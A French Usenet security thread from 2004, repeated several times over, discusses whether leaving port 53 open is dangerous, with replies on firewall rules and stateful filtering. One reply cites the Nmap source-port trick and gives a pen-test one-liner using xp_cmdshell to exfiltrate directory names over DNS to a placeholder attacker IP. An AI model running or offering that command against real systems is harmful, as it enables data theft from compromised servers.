Comme il m'arrive régulièrement de faire des nslookup sur des DNS
variés, j'ai tendance à laisser le port 53 grand ouvert. Est-ce que ça
présente un danger important ?
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Xavier Roche
Fabien LE LEZ wrote:
Comme il m'arrive régulièrement de faire des nslookup sur des DNS variés, j'ai tendance à laisser le port 53 grand ouvert.
Euhh pour faire des nslookup il suffit:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction des IP de destination possible, mais non obligatoire) - d'autoriser les paquets UDP :53 vers l'exterieur (même remarque) - d'autoriser les paquets UDP provenant de l'exterieur port :53 et allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Avec ça, aucun port 53 visible de l'exterieur, mais les nslookup fonctionnent.
Est-ce que ça présente un danger important ?
Si UDP/TCP :53 ne sont pas accessible depuis l'exterieur, non.
(*) : La règle "accepter tout paquet provenant de :53" est dangereuse si on ne restreint pas au moins la plage de ports de destination: il serait alors facile d'établir une connexion sur le :22 ou sur le :53 depuis le :53, par exemple ...
Fabien LE LEZ wrote:
Comme il m'arrive régulièrement de faire des nslookup sur des DNS
variés, j'ai tendance à laisser le port 53 grand ouvert.
Euhh pour faire des nslookup il suffit:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction
des IP de destination possible, mais non obligatoire)
- d'autoriser les paquets UDP :53 vers l'exterieur (même remarque)
- d'autoriser les paquets UDP provenant de l'exterieur port :53 et
allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP
source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Avec ça, aucun port 53 visible de l'exterieur, mais les nslookup
fonctionnent.
Est-ce que ça
présente un danger important ?
Si UDP/TCP :53 ne sont pas accessible depuis l'exterieur, non.
(*) : La règle "accepter tout paquet provenant de :53" est dangereuse si
on ne restreint pas au moins la plage de ports de destination: il serait
alors facile d'établir une connexion sur le :22 ou sur le :53 depuis le
:53, par exemple ...
Comme il m'arrive régulièrement de faire des nslookup sur des DNS variés, j'ai tendance à laisser le port 53 grand ouvert.
Euhh pour faire des nslookup il suffit:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction des IP de destination possible, mais non obligatoire) - d'autoriser les paquets UDP :53 vers l'exterieur (même remarque) - d'autoriser les paquets UDP provenant de l'exterieur port :53 et allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Avec ça, aucun port 53 visible de l'exterieur, mais les nslookup fonctionnent.
Est-ce que ça présente un danger important ?
Si UDP/TCP :53 ne sont pas accessible depuis l'exterieur, non.
(*) : La règle "accepter tout paquet provenant de :53" est dangereuse si on ne restreint pas au moins la plage de ports de destination: il serait alors facile d'établir une connexion sur le :22 ou sur le :53 depuis le :53, par exemple ...
T0t0
"Fabien LE LEZ" wrote in message news:
Comme il m'arrive régulièrement de faire des nslookup sur des DNS variés, j'ai tendance à laisser le port 53 grand ouvert. Est-ce que ça présente un danger important ?
De compréhension TCP oui ;-) Tu ne dois pas laisser entrer de requêtes sur le port 53 (TCP/UDP) pour pouvoir faire des requêtes DNS.
Xavier l'a très bien expliqué. J'ajouterais qu'un firewall stateful te fera le filtrage automatiquement. Tu bloques tout en entrée de toute façon, et toutes les requêtes sortantes verront leurs réponses autorisées à entrer.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
"Fabien LE LEZ" <gramster@gramster.com> wrote in message
news:tqi530pk7par4h155msrkl1t6dcdj72pj3@4ax.com
Comme il m'arrive régulièrement de faire des nslookup sur des DNS
variés, j'ai tendance à laisser le port 53 grand ouvert. Est-ce que ça
présente un danger important ?
De compréhension TCP oui ;-)
Tu ne dois pas laisser entrer de requêtes sur le port 53 (TCP/UDP)
pour pouvoir faire des requêtes DNS.
Xavier l'a très bien expliqué. J'ajouterais qu'un firewall stateful te
fera le filtrage automatiquement. Tu bloques tout en entrée de toute
façon, et toutes les requêtes sortantes verront leurs réponses
autorisées à entrer.
--
Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
Comme il m'arrive régulièrement de faire des nslookup sur des DNS variés, j'ai tendance à laisser le port 53 grand ouvert. Est-ce que ça présente un danger important ?
De compréhension TCP oui ;-) Tu ne dois pas laisser entrer de requêtes sur le port 53 (TCP/UDP) pour pouvoir faire des requêtes DNS.
Xavier l'a très bien expliqué. J'ajouterais qu'un firewall stateful te fera le filtrage automatiquement. Tu bloques tout en entrée de toute façon, et toutes les requêtes sortantes verront leurs réponses autorisées à entrer.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
Nicob
On Thu, 19 Feb 2004 08:35:21 +0000, Xavier Roche wrote:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction des IP de destination possible, mais non obligatoire)
OK. Utile pour les transferts de zone et les "grosses" reponses
- d'autoriser les paquets UDP :53 vers l'exterieur (même remarque)
OK.
- d'autoriser les paquets UDP provenant de l'exterieur port :53 et allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Tous les pare-feux ne font-ils pas de suivi de sessions ? Cela permettrait de supprimer cette règle, car une règle pareille, c'est le panard pour un attaquant :
"Many naive firewall and packet filter installations make an exception in their rule-set to allow DNS (53) or FTP-DATA (20) packets to come through and establish a connection." Manuel de Nmap, option "-g"
Est-ce que ça présente un danger important ?
Je ne sais pas si tu es en situation end-user ou réseau, mais je peux dire que dans bien des pen-tests, l'autorisation du trafic UDP/53 sortant des DMZ est un sacré avantage pour l'attaquant. Exemple :
exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:*.`) do (nslookup %l. YOUR_IP_HERE)'
Nicob
On Thu, 19 Feb 2004 08:35:21 +0000, Xavier Roche wrote:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction
des IP de destination possible, mais non obligatoire)
OK. Utile pour les transferts de zone et les "grosses" reponses
- d'autoriser les paquets UDP :53 vers l'exterieur (même remarque)
OK.
- d'autoriser les paquets UDP provenant de l'exterieur port :53 et
allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP
source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Tous les pare-feux ne font-ils pas de suivi de sessions ? Cela
permettrait de supprimer cette règle, car une règle pareille, c'est le
panard pour un attaquant :
"Many naive firewall and packet filter installations make an exception in
their rule-set to allow DNS (53) or FTP-DATA (20) packets to come
through and establish a connection." Manuel de Nmap, option "-g"
Est-ce que ça présente un danger important ?
Je ne sais pas si tu es en situation end-user ou réseau, mais je peux
dire que dans bien des pen-tests, l'autorisation du trafic UDP/53 sortant
des DMZ est un sacré avantage pour l'attaquant. Exemple :
exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir
c:*.`) do (nslookup %l. YOUR_IP_HERE)'
On Thu, 19 Feb 2004 08:35:21 +0000, Xavier Roche wrote:
- d'autoriser les connexions TCP :53 vers l'exterieur (avec restriction des IP de destination possible, mais non obligatoire)
OK. Utile pour les transferts de zone et les "grosses" reponses
- d'autoriser les paquets UDP :53 vers l'exterieur (même remarque)
OK.
- d'autoriser les paquets UDP provenant de l'exterieur port :53 et allant vers l'interne ports :1024-65536 (*), avec restriction de l'IP source si possible (une règle par DNS à autoriser)
(et évidemment accepter les paquets TCP de réponse provenant de l'exterieur)
Tous les pare-feux ne font-ils pas de suivi de sessions ? Cela permettrait de supprimer cette règle, car une règle pareille, c'est le panard pour un attaquant :
"Many naive firewall and packet filter installations make an exception in their rule-set to allow DNS (53) or FTP-DATA (20) packets to come through and establish a connection." Manuel de Nmap, option "-g"
Est-ce que ça présente un danger important ?
Je ne sais pas si tu es en situation end-user ou réseau, mais je peux dire que dans bien des pen-tests, l'autorisation du trafic UDP/53 sortant des DMZ est un sacré avantage pour l'attaquant. Exemple :
exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:*.`) do (nslookup %l. YOUR_IP_HERE)'
